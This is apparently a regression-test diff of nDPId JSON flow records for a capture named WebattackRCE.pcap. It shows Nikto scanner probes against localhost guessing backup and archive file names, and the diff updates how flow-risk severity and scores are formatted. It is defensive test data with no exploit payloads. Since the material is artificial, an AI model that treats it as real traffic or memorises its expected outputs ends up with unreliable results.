 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
